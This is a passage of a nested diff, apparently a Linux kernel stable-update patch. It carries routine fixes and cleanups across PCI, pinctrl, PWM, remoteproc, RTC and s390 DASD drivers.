+ }
+ 
+-static inline bool pci_dev_is_disconnected(const struct pci_dev *dev)
+-{
+-	return dev->error_state == pci_channel_io_perm_failure;
+-}
+-
+ /* pci_dev priv_flags */
+ #define PCI_DEV_ADDED 0
+ #define PCI_DPC_RECOVERED 1
+diff --git a/drivers/pci/pcie/dpc.c b/drivers/pci/pcie/dpc.c
+index a5d7c69b764e0..08800282825e1 100644
+--- a/drivers/pci/pcie/dpc.c
++++ b/drivers/pci/pcie/dpc.c
+@@ -231,7 +231,7 @@ static void dpc_process_rp_pio_error(struct pci_dev *pdev)
+ 
+ 	for (i = 0; i < pdev->dpc_rp_log_size - 5; i++) {
+ 		pci_read_config_dword(pdev,
+-			cap + PCI_EXP_DPC_RP_PIO_TLPPREFIX_LOG, &prefix);
++			cap + PCI_EXP_DPC_RP_PIO_TLPPREFIX_LOG + i * 4, &prefix);
+ 		pci_err(pdev, "TLP Prefix Header: dw%d, %#010x\n", i, prefix);
+ 	}
+  clear_status:
+diff --git a/drivers/pci/quirks.c b/drivers/pci/quirks.c
+index 51d634fbdfb8e..c175b70a984c6 100644
+--- a/drivers/pci/quirks.c
++++ b/drivers/pci/quirks.c
+@@ -5415,6 +5415,7 @@ static void quirk_no_ext_tags(struct pci_dev *pdev)
+ 
+ 	pci_walk_bus(bridge->bus, pci_configure_extended_tags, NULL);
+ }
++DECLARE_PCI_FIXUP_EARLY(PCI_VENDOR_ID_3WARE, 0x1004, quirk_no_ext_tags);
+ DECLARE_PCI_FIXUP_EARLY(PCI_VENDOR_ID_SERVERWORKS, 0x0132, quirk_no_ext_tags);
+ DECLARE_PCI_FIXUP_EARLY(PCI_VENDOR_ID_SERVERWORKS, 0x0140, quirk_no_ext_tags);
+ DECLARE_PCI_FIXUP_EARLY(PCI_VENDOR_ID_SERVERWORKS, 0x0141, quirk_no_ext_tags);
+diff --git a/drivers/pci/switch/switchtec.c b/drivers/pci/switch/switchtec.c
+index 3f3320d0a4f8f..d05a482639e3c 100644
+--- a/drivers/pci/switch/switchtec.c
++++ b/drivers/pci/switch/switchtec.c
+@@ -1674,7 +1674,7 @@ static int switchtec_pci_probe(struct pci_dev *pdev,
+ 	rc = switchtec_init_isr(stdev);
+ 	if (rc) {
+ 		dev_err(&stdev->dev, "failed to init isr.\n");
+-		goto err_put;
++		goto err_exit_pci;
+ 	}
+ 
+ 	iowrite32(SWITCHTEC_EVENT_CLEAR |
+@@ -1695,6 +1695,8 @@ static int switchtec_pci_probe(struct pci_dev *pdev,
+ 
+ err_devadd:
+ 	stdev_kill(stdev);
++err_exit_pci:
++	switchtec_exit_pci(stdev);
+ err_put:
+ 	ida_free(&switchtec_minor_ida, MINOR(stdev->dev.devt));
+ 	put_device(&stdev->dev);
+diff --git a/drivers/perf/arm-cmn.c b/drivers/perf/arm-cmn.c
+index 47e7c3206939f..899e4ed49905c 100644
+--- a/drivers/perf/arm-cmn.c
++++ b/drivers/perf/arm-cmn.c
+@@ -2178,6 +2178,17 @@ static int arm_cmn_discover(struct arm_cmn *cmn, unsigned int rgn_offset)
+ 				dev_dbg(cmn->dev, "ignoring external node %llx\n", reg);
+ 				continue;
+ 			}
++			/*
++			 * AmpereOneX erratum AC04_MESH_1 makes some XPs report a bogus
++			 * child count larger than the number of valid child pointers.
++			 * A child offset of 0 can only occur on CMN-600; otherwise it
++			 * would imply the root node being its own grandchild, which
++			 * we can safely dismiss in general.
++			 */
++			if (reg == 0 && cmn->part != PART_CMN600) {
++				dev_dbg(cmn->dev, "bogus child pointer?\n");
++				continue;
++			}
+ 
+ 			arm_cmn_init_node_info(cmn, reg & CMN_CHILD_NODE_ADDR, dn);
+ 
+diff --git a/drivers/pinctrl/mediatek/pinctrl-mt8186.c b/drivers/pinctrl/mediatek/pinctrl-mt8186.c
+index a02f7c3269707..09edcf47effec 100644
+--- a/drivers/pinctrl/mediatek/pinctrl-mt8186.c
++++ b/drivers/pinctrl/mediatek/pinctrl-mt8186.c
+@@ -1198,7 +1198,6 @@ static const struct mtk_pin_reg_calc mt8186_reg_cals[PINCTRL_PIN_REG_MAX] = {
+ 	[PINCTRL_PIN_REG_DIR] = MTK_RANGE(mt8186_pin_dir_range),
+ 	[PINCTRL_PIN_REG_DI] = MTK_RANGE(mt8186_pin_di_range),
+ 	[PINCTRL_PIN_REG_DO] = MTK_RANGE(mt8186_pin_do_range),
+-	[PINCTRL_PIN_REG_SR] = MTK_RANGE(mt8186_pin_dir_range),
+ 	[PINCTRL_PIN_REG_SMT] = MTK_RANGE(mt8186_pin_smt_range),
+ 	[PINCTRL_PIN_REG_IES] = MTK_RANGE(mt8186_pin_ies_range),
+ 	[PINCTRL_PIN_REG_PU] = MTK_RANGE(mt8186_pin_pu_range),
+diff --git a/drivers/pinctrl/mediatek/pinctrl-mt8192.c b/drivers/pinctrl/mediatek/pinctrl-mt8192.c
+index 9695f4ec6aba9..f120268c00f56 100644
+--- a/drivers/pinctrl/mediatek/pinctrl-mt8192.c
++++ b/drivers/pinctrl/mediatek/pinctrl-mt8192.c
+@@ -1379,7 +1379,6 @@ static const struct mtk_pin_reg_calc mt8192_reg_cals[PINCTRL_PIN_REG_MAX] = {
+ 	[PINCTRL_PIN_REG_DIR] = MTK_RANGE(mt8192_pin_dir_range),
+ 	[PINCTRL_PIN_REG_DI] = MTK_RANGE(mt8192_pin_di_range),
+ 	[PINCTRL_PIN_REG_DO] = MTK_RANGE(mt8192_pin_do_range),
+-	[PINCTRL_PIN_REG_SR] = MTK_RANGE(mt8192_pin_dir_range),
+ 	[PINCTRL_PIN_REG_SMT] = MTK_RANGE(mt8192_pin_smt_range),
+ 	[PINCTRL_PIN_REG_IES] = MTK_RANGE(mt8192_pin_ies_range),
+ 	[PINCTRL_PIN_REG_PU] = MTK_RANGE(mt8192_pin_pu_range),
+diff --git a/drivers/pinctrl/nomadik/pinctrl-nomadik.c b/drivers/pinctrl/nomadik/pinctrl-nomadik.c
+index f7d02513d8cc1..e79037dc85796 100644
+--- a/drivers/pinctrl/nomadik/pinctrl-nomadik.c
++++ b/drivers/pinctrl/nomadik/pinctrl-nomadik.c
+@@ -1571,8 +1571,10 @@ static int nmk_pmx_set(struct pinctrl_dev *pctldev, unsigned function,
+ 		 * Then mask the pins that need to be sleeping now when we're
+ 		 * switching to the ALT C function.
+ 		 */
+-		for (i = 0; i < g->grp.npins; i++)
+-			slpm[g->grp.pins[i] / NMK_GPIO_PER_CHIP] &= ~BIT(g->grp.pins[i]);
++		for (i = 0; i < g->grp.npins; i++) {
++			unsigned int bit = g->grp.pins[i] % NMK_GPIO_PER_CHIP;
++			slpm[g->grp.pins[i] / NMK_GPIO_PER_CHIP] &= ~BIT(bit);
++		}
+ 		nmk_gpio_glitch_slpm_init(slpm);
+ 	}
+ 
+diff --git a/drivers/pinctrl/renesas/pfc-r8a779g0.c b/drivers/pinctrl/renesas/pfc-r8a779g0.c
+index 43a63a21a6fb5..acf7664ea835b 100644
+--- a/drivers/pinctrl/renesas/pfc-r8a779g0.c
++++ b/drivers/pinctrl/renesas/pfc-r8a779g0.c
+@@ -2360,6 +2360,30 @@ static const unsigned int scif_clk_mux[] = {
+ 	SCIF_CLK_MARK,
+ };
+ 
++static const unsigned int scif_clk2_pins[] = {
++	/* SCIF_CLK2 */
++	RCAR_GP_PIN(8, 11),
++};
++static const unsigned int scif_clk2_mux[] = {
++	SCIF_CLK2_MARK,
++};
++
++/* - SSI ------------------------------------------------- */
++static const unsigned int ssi_data_pins[] = {
++	/* SSI_SD */
++	RCAR_GP_PIN(1, 20),
++};
++static const unsigned int ssi_data_mux[] = {
++	SSI_SD_MARK,
++};
++static const unsigned int ssi_ctrl_pins[] = {
++	/* SSI_SCK,  SSI_WS */
++	RCAR_GP_PIN(1, 18), RCAR_GP_PIN(1, 19),
++};
++static const unsigned int ssi_ctrl_mux[] = {
++	SSI_SCK_MARK, SSI_WS_MARK,
++};
++
+ /* - TPU ------------------------------------------------------------------- */
+ static const unsigned int tpu_to0_pins[] = {
+ 	/* TPU0TO0 */
+@@ -2651,6 +2675,10 @@ static const struct sh_pfc_pin_group pinmux_groups[] = {
+ 	SH_PFC_PIN_GROUP(scif4_clk),
+ 	SH_PFC_PIN_GROUP(scif4_ctrl),
+ 	SH_PFC_PIN_GROUP(scif_clk),
++	SH_PFC_PIN_GROUP(scif_clk2),
++
++	SH_PFC_PIN_GROUP(ssi_data),
++	SH_PFC_PIN_GROUP(ssi_ctrl),
+ 
+ 	SH_PFC_PIN_GROUP(tpu_to0),		/* suffix might be updated */
+ 	SH_PFC_PIN_GROUP(tpu_to0_a),		/* suffix might be updated */
+@@ -2964,6 +2992,15 @@ static const char * const scif_clk_groups[] = {
+ 	"scif_clk",
+ };
+ 
++static const char * const scif_clk2_groups[] = {
++	"scif_clk2",
++};
++
++static const char * const ssi_groups[] = {
++	"ssi_data",
++	"ssi_ctrl",
++};
++
+ static const char * const tpu_groups[] = {
+ 	/* suffix might be updated */
+ 	"tpu_to0",
+@@ -3044,6 +3081,9 @@ static const struct sh_pfc_function pinmux_functions[] = {
+ 	SH_PFC_FUNCTION(scif3),
+ 	SH_PFC_FUNCTION(scif4),
+ 	SH_PFC_FUNCTION(scif_clk),
++	SH_PFC_FUNCTION(scif_clk2),
++
++	SH_PFC_FUNCTION(ssi),
+ 
+ 	SH_PFC_FUNCTION(tpu),
+ 
+diff --git a/drivers/powercap/dtpm_cpu.c b/drivers/powercap/dtpm_cpu.c
+index 9193c3b8edebe..ae7ee611978ba 100644
+--- a/drivers/powercap/dtpm_cpu.c
++++ b/drivers/powercap/dtpm_cpu.c
+@@ -219,7 +219,7 @@ static int __dtpm_cpu_setup(int cpu, struct dtpm *parent)
+ 	ret = freq_qos_add_request(&policy->constraints,
+ 				   &dtpm_cpu->qos_req, FREQ_QOS_MAX,
+ 				   pd->table[pd->nr_perf_states - 1].frequency);
+-	if (ret)
++	if (ret < 0)
+ 		goto out_dtpm_unregister;
+ 
+ 	cpufreq_cpu_put(policy);
+diff --git a/drivers/pwm/pwm-atmel-hlcdc.c b/drivers/pwm/pwm-atmel-hlcdc.c
+index a43b2babc8093..3e9c94a8d7f72 100644
+--- a/drivers/pwm/pwm-atmel-hlcdc.c
++++ b/drivers/pwm/pwm-atmel-hlcdc.c
+@@ -38,11 +38,11 @@ static inline struct atmel_hlcdc_pwm *to_atmel_hlcdc_pwm(struct pwm_chip *chip)
+ 	return container_of(chip, struct atmel_hlcdc_pwm, chip);
+ }
+ 
+-static int atmel_hlcdc_pwm_apply(struct pwm_chip *c, struct pwm_device *pwm,
++static int atmel_hlcdc_pwm_apply(struct pwm_chip *chip, struct pwm_device *pwm,
+ 				 const struct pwm_state *state)
+ {
+-	struct atmel_hlcdc_pwm *chip = to_atmel_hlcdc_pwm(c);
+-	struct atmel_hlcdc *hlcdc = chip->hlcdc;
++	struct atmel_hlcdc_pwm *atmel = to_atmel_hlcdc_pwm(chip);
++	struct atmel_hlcdc *hlcdc = atmel->hlcdc;
+ 	unsigned int status;
+ 	int ret;
+ 
+@@ -54,7 +54,7 @@ static int atmel_hlcdc_pwm_apply(struct pwm_chip *c, struct pwm_device *pwm,
+ 		u32 pwmcfg;
+ 		int pres;
+ 
+-		if (!chip->errata || !chip->errata->slow_clk_erratum) {
++		if (!atmel->errata || !atmel->errata->slow_clk_erratum) {
+ 			clk_freq = clk_get_rate(new_clk);
+ 			if (!clk_freq)
+ 				return -EINVAL;
+@@ -64,7 +64,7 @@ static int atmel_hlcdc_pwm_apply(struct pwm_chip *c, struct pwm_device *pwm,
+ 		}
+ 
+ 		/* Errata: cannot use slow clk on some IP revisions */
+-		if ((chip->errata && chip->errata->slow_clk_erratum) ||
++		if ((atmel->errata && atmel->errata->slow_clk_erratum) ||
+ 		    clk_period_ns > state->period) {
+ 			new_clk = hlcdc->sys_clk;
+ 			clk_freq = clk_get_rate(new_clk);
+@@ -77,8 +77,8 @@ static int atmel_hlcdc_pwm_apply(struct pwm_chip *c, struct pwm_device *pwm,
+ 
+ 		for (pres = 0; pres <= ATMEL_HLCDC_PWMPS_MAX; pres++) {
+ 		/* Errata: cannot divide by 1 on some IP revisions */
+-			if (!pres && chip->errata &&
+-			    chip->errata->div1_clk_erratum)
++			if (!pres && atmel->errata &&
++			    atmel->errata->div1_clk_erratum)
+ 				continue;
+ 
+ 			if ((clk_period_ns << pres) >= state->period)
+@@ -90,7 +90,7 @@ static int atmel_hlcdc_pwm_apply(struct pwm_chip *c, struct pwm_device *pwm,
+ 
+ 		pwmcfg = ATMEL_HLCDC_PWMPS(pres);
+ 
+-		if (new_clk != chip->cur_clk) {
++		if (new_clk != atmel->cur_clk) {
+ 			u32 gencfg = 0;
+ 			int ret;
+ 
+@@ -98,8 +98,8 @@ static int atmel_hlcdc_pwm_apply(struct pwm_chip *c, struct pwm_device *pwm,
+ 			if (ret)
+ 				return ret;
+ 
+-			clk_disable_unprepare(chip->cur_clk);
+-			chip->cur_clk = new_clk;
++			clk_disable_unprepare(atmel->cur_clk);
++			atmel->cur_clk = new_clk;
+ 
+ 			if (new_clk == hlcdc->sys_clk)
+ 				gencfg = ATMEL_HLCDC_CLKPWMSEL;
+@@ -160,8 +160,8 @@ static int atmel_hlcdc_pwm_apply(struct pwm_chip *c, struct pwm_device *pwm,
+ 		if (ret)
+ 			return ret;
+ 
+-		clk_disable_unprepare(chip->cur_clk);
+-		chip->cur_clk = NULL;
++		clk_disable_unprepare(atmel->cur_clk);
++		atmel->cur_clk = NULL;
+ 	}
+ 
+ 	return 0;
+@@ -183,31 +183,32 @@ static const struct atmel_hlcdc_pwm_errata atmel_hlcdc_pwm_sama5d3_errata = {
+ #ifdef CONFIG_PM_SLEEP
+ static int atmel_hlcdc_pwm_suspend(struct device *dev)
+ {
+-	struct atmel_hlcdc_pwm *chip = dev_get_drvdata(dev);
++	struct atmel_hlcdc_pwm *atmel = dev_get_drvdata(dev);
+ 
+ 	/* Keep the periph clock enabled if the PWM is still running. */
+-	if (pwm_is_enabled(&chip->chip.pwms[0]))
+-		clk_disable_unprepare(chip->hlcdc->periph_clk);
++	if (!pwm_is_enabled(&atmel->chip.pwms[0]))
++		clk_disable_unprepare(atmel->hlcdc->periph_clk);
+ 
+ 	return 0;
+ }
+ 
+ static int atmel_hlcdc_pwm_resume(struct device *dev)
+ {
+-	struct atmel_hlcdc_pwm *chip = dev_get_drvdata(dev);
++	struct atmel_hlcdc_pwm *atmel = dev_get_drvdata(dev);
+ 	struct pwm_state state;
+ 	int ret;
+ 
+-	pwm_get_state(&chip->chip.pwms[0], &state);
++	pwm_get_state(&atmel->chip.pwms[0], &state);
+ 
+ 	/* Re-enable the periph clock it was stopped during suspend. */
+ 	if (!state.enabled) {
+-		ret = clk_prepare_enable(chip->hlcdc->periph_clk);
++		ret = clk_prepare_enable(atmel->hlcdc->periph_clk);
+ 		if (ret)
+ 			return ret;
+ 	}
+ 
+-	return atmel_hlcdc_pwm_apply(&chip->chip, &chip->chip.pwms[0], &state);
++	return atmel_hlcdc_pwm_apply(&atmel->chip, &atmel->chip.pwms[0],
++				     &state);
+ }
+ #endif
+ 
+@@ -244,14 +245,14 @@ static int atmel_hlcdc_pwm_probe(struct platform_device *pdev)
+ {
+ 	const struct of_device_id *match;
+ 	struct device *dev = &pdev->dev;
+-	struct atmel_hlcdc_pwm *chip;
++	struct atmel_hlcdc_pwm *atmel;
+ 	struct atmel_hlcdc *hlcdc;
+ 	int ret;
+ 
+ 	hlcdc = dev_get_drvdata(dev->parent);
+ 
+-	chip = devm_kzalloc(dev, sizeof(*chip), GFP_KERNEL);
+-	if (!chip)
++	atmel = devm_kzalloc(dev, sizeof(*atmel), GFP_KERNEL);
++	if (!atmel)
+ 		return -ENOMEM;
+ 
+ 	ret = clk_prepare_enable(hlcdc->periph_clk);
+@@ -260,33 +261,31 @@ static int atmel_hlcdc_pwm_probe(struct platform_device *pdev)
+ 
+ 	match = of_match_node(atmel_hlcdc_dt_ids, dev->parent->of_node);
+ 	if (match)
+-		chip->errata = match->data;
++		atmel->errata = match->data;
+ 
+-	chip->hlcdc = hlcdc;
+-	chip->chip.ops = &atmel_hlcdc_pwm_ops;
+-	chip->chip.dev = dev;
+-	chip->chip.npwm = 1;
++	atmel->hlcdc = hlcdc;
++	atmel->chip.ops = &atmel_hlcdc_pwm_ops;
++	atmel->chip.dev = dev;
++	atmel->chip.npwm = 1;
+ 
+-	ret = pwmchip_add(&chip->chip);
++	ret = pwmchip_add(&atmel->chip);
+ 	if (ret) {
+ 		clk_disable_unprepare(hlcdc->periph_clk);
+ 		return ret;
+ 	}
+ 
+-	platform_set_drvdata(pdev, chip);
++	platform_set_drvdata(pdev, atmel);
+ 
+ 	return 0;
+ }
+ 
+-static int atmel_hlcdc_pwm_remove(struct platform_device *pdev)
++static void atmel_hlcdc_pwm_remove(struct platform_device *pdev)
+ {
+-	struct atmel_hlcdc_pwm *chip = platform_get_drvdata(pdev);
++	struct atmel_hlcdc_pwm *atmel = platform_get_drvdata(pdev);
+ 
+-	pwmchip_remove(&chip->chip);
++	pwmchip_remove(&atmel->chip);
+ 
+-	clk_disable_unprepare(chip->hlcdc->periph_clk);
+-
+-	return 0;
++	clk_disable_unprepare(atmel->hlcdc->periph_clk);
+ }
+ 
+ static const struct of_device_id atmel_hlcdc_pwm_dt_ids[] = {
+@@ -301,7 +300,7 @@ static struct platform_driver atmel_hlcdc_pwm_driver = {
+ 		.pm = &atmel_hlcdc_pwm_pm_ops,
+ 	},
+ 	.probe = atmel_hlcdc_pwm_probe,
+-	.remove = atmel_hlcdc_pwm_remove,
++	.remove_new = atmel_hlcdc_pwm_remove,
+ };
+ module_platform_driver(atmel_hlcdc_pwm_driver);
+ 
+diff --git a/drivers/pwm/pwm-sti.c b/drivers/pwm/pwm-sti.c
+index 652fdb8dc7bfa..0a7920cbd4949 100644
+--- a/drivers/pwm/pwm-sti.c
++++ b/drivers/pwm/pwm-sti.c
+@@ -395,8 +395,17 @@ static int sti_pwm_capture(struct pwm_chip *chip, struct pwm_device *pwm,
+ static int sti_pwm_apply(struct pwm_chip *chip, struct pwm_device *pwm,
+ 			 const struct pwm_state *state)
+ {
++	struct sti_pwm_chip *pc = to_sti_pwmchip(chip);
++	struct sti_pwm_compat_data *cdata = pc->cdata;
++	struct device *dev = pc->dev;
+ 	int err;
+ 
++	if (pwm->hwpwm >= cdata->pwm_num_devs) {
++		dev_err(dev, "device %u is not valid for pwm mode\n",
++			pwm->hwpwm);
++		return -EINVAL;
++	}
++
+ 	if (state->polarity != PWM_POLARITY_NORMAL)
+ 		return -EINVAL;
+ 
+@@ -647,7 +656,7 @@ static int sti_pwm_probe(struct platform_device *pdev)
+ 
+ 	pc->chip.dev = dev;
+ 	pc->chip.ops = &sti_pwm_ops;
+-	pc->chip.npwm = pc->cdata->pwm_num_devs;
++	pc->chip.npwm = max(cdata->pwm_num_devs, cdata->cpt_num_devs);
+ 
+ 	for (i = 0; i < cdata->cpt_num_devs; i++) {
+ 		struct sti_cpt_ddata *ddata = &cdata->ddata[i];
+diff --git a/drivers/remoteproc/Kconfig b/drivers/remoteproc/Kconfig
+index 1660197866531..d93113b6ffaa1 100644
+--- a/drivers/remoteproc/Kconfig
++++ b/drivers/remoteproc/Kconfig
+@@ -313,7 +313,7 @@ config ST_SLIM_REMOTEPROC
+ 
+ config STM32_RPROC
+ 	tristate "STM32 remoteproc support"
+-	depends on ARCH_STM32
++	depends on ARCH_STM32 || COMPILE_TEST
+ 	depends on REMOTEPROC
+ 	select MAILBOX
+ 	help
+diff --git a/drivers/remoteproc/stm32_rproc.c b/drivers/remoteproc/stm32_rproc.c
+index 8746cbb1f168d..74da0393172c5 100644
+--- a/drivers/remoteproc/stm32_rproc.c
++++ b/drivers/remoteproc/stm32_rproc.c
+@@ -118,10 +118,10 @@ static int stm32_rproc_mem_alloc(struct rproc *rproc,
+ 	struct device *dev = rproc->dev.parent;
+ 	void *va;
+ 
+-	dev_dbg(dev, "map memory: %pa+%x\n", &mem->dma, mem->len);
+-	va = ioremap_wc(mem->dma, mem->len);
++	dev_dbg(dev, "map memory: %pad+%zx\n", &mem->dma, mem->len);
++	va = (__force void *)ioremap_wc(mem->dma, mem->len);
+ 	if (IS_ERR_OR_NULL(va)) {
+-		dev_err(dev, "Unable to map memory region: %pa+%x\n",
++		dev_err(dev, "Unable to map memory region: %pad+0x%zx\n",
+ 			&mem->dma, mem->len);
+ 		return -ENOMEM;
+ 	}
+@@ -136,7 +136,7 @@ static int stm32_rproc_mem_release(struct rproc *rproc,
+ 				   struct rproc_mem_entry *mem)
+ {
+ 	dev_dbg(rproc->dev.parent, "unmap memory: %pa\n", &mem->dma);
+-	iounmap(mem->va);
++	iounmap((__force __iomem void *)mem->va);
+ 
+ 	return 0;
+ }
+@@ -627,7 +627,7 @@ stm32_rproc_get_loaded_rsc_table(struct rproc *rproc, size_t *table_sz)
+ 
+ 	ddata->rsc_va = devm_ioremap_wc(dev, rsc_pa, RSC_TBL_SIZE);
+ 	if (IS_ERR_OR_NULL(ddata->rsc_va)) {
+-		dev_err(dev, "Unable to map memory region: %pa+%zx\n",
++		dev_err(dev, "Unable to map memory region: %pa+%x\n",
+ 			&rsc_pa, RSC_TBL_SIZE);
+ 		ddata->rsc_va = NULL;
+ 		return ERR_PTR(-ENOMEM);
+@@ -641,7 +641,7 @@ stm32_rproc_get_loaded_rsc_table(struct rproc *rproc, size_t *table_sz)
+ 	 * entire area by overwriting it with the initial values stored in rproc->clean_table.
+ 	 */
+ 	*table_sz = RSC_TBL_SIZE;
+-	return (struct resource_table *)ddata->rsc_va;
++	return (__force struct resource_table *)ddata->rsc_va;
+ }
+ 
+ static const struct rproc_ops st_rproc_ops = {
+@@ -889,7 +889,7 @@ static int stm32_rproc_remove(struct platform_device *pdev)
+ 	return 0;
+ }
+ 
+-static int __maybe_unused stm32_rproc_suspend(struct device *dev)
++static int stm32_rproc_suspend(struct device *dev)
+ {
+ 	struct rproc *rproc = dev_get_drvdata(dev);
+ 	struct stm32_rproc *ddata = rproc->priv;
+@@ -900,7 +900,7 @@ static int __maybe_unused stm32_rproc_suspend(struct device *dev)
+ 	return 0;
+ }
+ 
+-static int __maybe_unused stm32_rproc_resume(struct device *dev)
++static int stm32_rproc_resume(struct device *dev)
+ {
+ 	struct rproc *rproc = dev_get_drvdata(dev);
+ 	struct stm32_rproc *ddata = rproc->priv;
+@@ -911,16 +911,16 @@ static int __maybe_unused stm32_rproc_resume(struct device *dev)
+ 	return 0;
+ }
+ 
+-static SIMPLE_DEV_PM_OPS(stm32_rproc_pm_ops,
+-			 stm32_rproc_suspend, stm32_rproc_resume);
++static DEFINE_SIMPLE_DEV_PM_OPS(stm32_rproc_pm_ops,
++				stm32_rproc_suspend, stm32_rproc_resume);
+ 
+ static struct platform_driver stm32_rproc_driver = {
+ 	.probe = stm32_rproc_probe,
+ 	.remove = stm32_rproc_remove,
+ 	.driver = {
+ 		.name = "stm32-rproc",
+-		.pm = &stm32_rproc_pm_ops,
+-		.of_match_table = of_match_ptr(stm32_rproc_match),
++		.pm = pm_ptr(&stm32_rproc_pm_ops),
++		.of_match_table = stm32_rproc_match,
+ 	},
+ };
+ module_platform_driver(stm32_rproc_driver);
+diff --git a/drivers/rtc/Kconfig b/drivers/rtc/Kconfig
+index bb63edb507da4..87dc050ca004c 100644
+--- a/drivers/rtc/Kconfig
++++ b/drivers/rtc/Kconfig
+@@ -1843,7 +1843,8 @@ config RTC_DRV_MT2712
+ 
+ config RTC_DRV_MT6397
+ 	tristate "MediaTek PMIC based RTC"
+-	depends on MFD_MT6397 || (COMPILE_TEST && IRQ_DOMAIN)
++	depends on MFD_MT6397 || COMPILE_TEST
++	select IRQ_DOMAIN
+ 	help
+ 	  This selects the MediaTek(R) RTC driver. RTC is part of MediaTek
+ 	  MT6397 PMIC. You should enable MT6397 PMIC MFD before select
+diff --git a/drivers/rtc/lib_test.c b/drivers/rtc/lib_test.c
+index d5caf36c56cdc..225c859d6da55 100644
+--- a/drivers/rtc/lib_test.c
++++ b/drivers/rtc/lib_test.c
+@@ -54,7 +54,7 @@ static void rtc_time64_to_tm_test_date_range(struct kunit *test)
+ 
+ 		days = div_s64(secs, 86400);
+ 
+-		#define FAIL_MSG "%d/%02d/%02d (%2d) : %ld", \
++		#define FAIL_MSG "%d/%02d/%02d (%2d) : %lld", \
+ 			year, month, mday, yday, days
+ 
+ 		KUNIT_ASSERT_EQ_MSG(test, year - 1900, result.tm_year, FAIL_MSG);
+diff --git a/drivers/s390/block/dasd.c b/drivers/s390/block/dasd.c
+index f207de4a87a0f..341d65acd715d 100644
+--- a/drivers/s390/block/dasd.c
++++ b/drivers/s390/block/dasd.c
+@@ -8,9 +8,6 @@
+  * Copyright IBM Corp. 1999, 2009
+  */
+ 
+-#define KMSG_COMPONENT "dasd"
+-#define pr_fmt(fmt) KMSG_COMPONENT ": " fmt
+-
+ #include <linux/kmod.h>
+ #include <linux/init.h>
+ #include <linux/interrupt.h>
+@@ -73,7 +70,8 @@ static void dasd_profile_init(struct dasd_profile *, struct dentry *);
+ static void dasd_profile_exit(struct dasd_profile *);
+ static void dasd_hosts_init(struct dentry *, struct dasd_device *);
+ static void dasd_hosts_exit(struct dasd_device *);
+-
++static int dasd_handle_autoquiesce(struct dasd_device *, struct dasd_ccw_req *,
++				   unsigned int);
+ /*
+  * SECTION: Operations on the device structure.
+  */
+@@ -2327,7 +2325,7 @@ static int _dasd_sleep_on(struct dasd_ccw_req *maincqr, int interruptible)
+ 		/* Non-temporary stop condition will trigger fail fast */
+ 		if (device->stopped & ~DASD_STOPPED_PENDING &&
+ 		    test_bit(DASD_CQR_FLAGS_FAILFAST, &cqr->flags) &&
+-		    (!dasd_eer_enabled(device))) {
++		    !dasd_eer_enabled(device) && device->aq_mask == 0) {
+ 			cqr->status = DASD_CQR_FAILED;
+ 			cqr->intrc = -ENOLINK;
+ 			continue;
+@@ -2803,20 +2801,18 @@ static void __dasd_process_block_ccw_queue(struct dasd_block *block,
+ 			dasd_log_sense(cqr, &cqr->irb);
+ 		}
+ 
+-		/* First of all call extended error reporting. */
+-		if (dasd_eer_enabled(base) &&
+-		    cqr->status == DASD_CQR_FAILED) {
+-			dasd_eer_write(base, cqr, DASD_EER_FATALERROR);
+-
+-			/* restart request  */
++		/*
++		 * First call extended error reporting and check for autoquiesce
++		 */
++		spin_lock_irqsave(get_ccwdev_lock(base->cdev), flags);
++		if (cqr->status == DASD_CQR_FAILED &&
++		    dasd_handle_autoquiesce(base, cqr, DASD_EER_FATALERROR)) {
+ 			cqr->status = DASD_CQR_FILLED;
+ 			cqr->retries = 255;
+-			spin_lock_irqsave(get_ccwdev_lock(base->cdev), flags);
+-			dasd_device_set_stop_bits(base, DASD_STOPPED_QUIESCE);
+-			spin_unlock_irqrestore(get_ccwdev_lock(base->cdev),
+-					       flags);
++			spin_unlock_irqrestore(get_ccwdev_lock(base->cdev), flags);
+ 			goto restart;
+ 		}
++		spin_unlock_irqrestore(get_ccwdev_lock(base->cdev), flags);
+ 
+ 		/* Process finished ERP request. */
+ 		if (cqr->refers) {
+@@ -2858,7 +2854,7 @@ static void __dasd_block_start_head(struct dasd_block *block)
+ 		/* Non-temporary stop condition will trigger fail fast */
+ 		if (block->base->stopped & ~DASD_STOPPED_PENDING &&
+ 		    test_bit(DASD_CQR_FLAGS_FAILFAST, &cqr->flags) &&
+-		    (!dasd_eer_enabled(block->base))) {
++		    !dasd_eer_enabled(block->base) && block->base->aq_mask == 0) {
+ 			cqr->status = DASD_CQR_FAILED;
+ 			cqr->intrc = -ENOLINK;
+ 			dasd_schedule_block_bh(block);
+@@ -3391,8 +3387,7 @@ static void dasd_generic_auto_online(void *data, async_cookie_t cookie)
+ 
+ 	ret = ccw_device_set_online(cdev);
+ 	if (ret)
+-		pr_warn("%s: Setting the DASD online failed with rc=%d\n",
+-			dev_name(&cdev->dev), ret);
++		dev_warn(&cdev->dev, "Setting the DASD online failed with rc=%d\n", ret);
+ }
+ 
+ /*
+@@ -3479,8 +3474,11 @@ int dasd_generic_set_online(struct ccw_device *cdev,
+ {
+ 	struct dasd_discipline *discipline;
+ 	struct dasd_device *device;
++	struct device *dev;
+ 	int rc;
+ 
++	dev = &cdev->dev;
++
+ 	/* first online clears initial online feature flag */
+ 	dasd_set_feature(cdev, DASD_FEATURE_INITIAL_ONLINE, 0);
+ 	device = dasd_create_device(cdev);
+@@ -3493,11 +3491,10 @@ int dasd_generic_set_online(struct ccw_device *cdev,
+ 			/* Try to load the required module. */
+ 			rc = request_module(DASD_DIAG_MOD);
+ 			if (rc) {
+-				pr_warn("%s Setting the DASD online failed "
+-					"because the required module %s "
+-					"could not be loaded (rc=%d)\n",
+-					dev_name(&cdev->dev), DASD_DIAG_MOD,
+-					rc);
++				dev_warn(dev, "Setting the DASD online failed "
++					 "because the required module %s "
++					 "could not be loaded (rc=%d)\n",
++					 DASD_DIAG_MOD, rc);
+ 				dasd_delete_device(device);
+ 				return -ENODEV;
+ 			}
+@@ -3505,8 +3502,7 @@ int dasd_generic_set_online(struct ccw_device *cdev,
+ 		/* Module init could have failed, so check again here after
+ 		 * request_module(). */
+ 		if (!dasd_diag_discipline_pointer) {
+-			pr_warn("%s Setting the DASD online failed because of missing DIAG discipline\n",
+-				dev_name(&cdev->dev));
++			dev_warn(dev, "Setting the DASD online failed because of missing DIAG discipline\n");
+ 			dasd_delete_device(device);
+ 			return -ENODEV;
+ 		}
+@@ -3516,37 +3512,33 @@ int dasd_generic_set_online(struct ccw_device *cdev,
+ 		dasd_delete_device(device);
+ 		return -EINVAL;
+ 	}
++	device->base_discipline = base_discipline;
+ 	if (!try_module_get(discipline->owner)) {
